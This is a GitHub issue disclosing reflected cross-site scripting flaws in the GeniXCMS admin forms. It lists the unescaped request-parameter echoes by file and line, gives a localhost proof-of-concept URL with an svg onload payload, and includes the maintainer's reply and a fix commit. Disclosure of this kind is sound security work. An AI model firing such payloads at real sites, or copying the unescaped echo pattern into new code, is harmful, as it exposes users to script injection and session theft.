Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
./gxadmin/inc/pages_form.php line 68
./gxadmin/inc/pages_form.php
<form action="index.php?page=pages&act=<?=$act?>&token=<?=$_GET['token'];?>" method="post" role="form" class="">
./gxadmin/inc/posts_form.php line 55
./gxadmin/inc/posts_form.php
<form action="index.php?page=posts&act=<?=$act?>&token=<?=$_GET['token'];?>" method="post" role="form" class="">
./gxadmin/inc/posts_form.php line 25
($_GET['act'] == 'edit') ? $act = "edit&id={$_GET['id']}&token=".$token : $act = 'add';
line 55
./gxadmin/inc/menus_form.php line 79
./gxadmin/inc/menus_form.php
<input type="text" name='id' class="form-control" value="<?=$menuid;?>" readonly >
./gxadmin/inc/menus_form_edit.php line 26
./gxadmin/inc/menus_form_edit.php
if (isset($_GET['token']) && Token::isExist($_GET['token'])) { $token = TOKEN; } else { $token = ''; }
line 225
<input type="hidden" name="token" value="<?=$token;?>">
./gxadmin/inc/menus_form_edit.php line 18
if (isset($_GET['id'])) { $menuid = $_GET['id']; } else { $menuid = $data['menuid']; }
line 104
./gxadmin/inc/user_form.php line 93
./gxadmin/inc/user_form.php
<input type="hidden" name="token" value="<?=$_GET['token'];?>">
http://localhost/GeniXCMS/gxadmin/index.php?page=pages&act=add&token=%22%3E%3Csvg%20onload=alert(1)%3E
The text was updated successfully, but these errors were encountered:
thank you @Xyntax. yeah there are still more issues available and i'm happy to know them. i'm still focusing on the features recently. i'll fix it soon.
Sorry, something went wrong.
Security Fix #61 #62 #63 #65 #66 #67
abfbb61
semplon
No branches or pull requests
1
./gxadmin/inc/pages_form.phpline 68
2
./gxadmin/inc/posts_form.phpline 55
3
./gxadmin/inc/posts_form.phpline 25
line 55
4
./gxadmin/inc/menus_form.phpline 79
5
./gxadmin/inc/menus_form_edit.phpline 26
line 225
6
./gxadmin/inc/menus_form_edit.phpline 18
line 104
7
./gxadmin/inc/user_form.phpline 93
PoC
http://localhost/GeniXCMS/gxadmin/index.php?page=pages&act=add&token=%22%3E%3Csvg%20onload=alert(1)%3EThe text was updated successfully, but these errors were encountered: